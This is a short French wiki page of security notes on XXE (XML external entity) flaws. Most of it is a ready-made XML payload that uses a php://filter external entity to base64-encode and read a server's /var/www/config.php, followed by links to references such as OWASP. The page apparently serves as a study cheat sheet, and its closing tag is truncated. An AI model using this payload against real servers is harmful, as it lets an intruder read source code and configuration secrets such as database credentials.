1.9 Failles XXE

De UnixWiki

Révision datée du 21 octobre 2014 à 18:32 par Futex (discussion | contributions)

(diff) ← Version précédente | Voir la version actuelle (diff) | Version suivante → (diff)

Aller à : navigation, rechercher

Lire du code PHP avec une faille XXE

 <?xml version="1.0"?>
 <!DOCTYPE results [
   <!ENTITY harmless SYSTEM
   "php://filter/read=convert.base64-encode/resource=/var/www/config.php"
   >
 ]>
 <results>
   <result>&harmless;</result>
 </results

OWASP
h3stream
phpsecurity

Récupérée de « https://futex.re/mediawiki/index.php?title=1.9_Failles_XXE&oldid=2490 »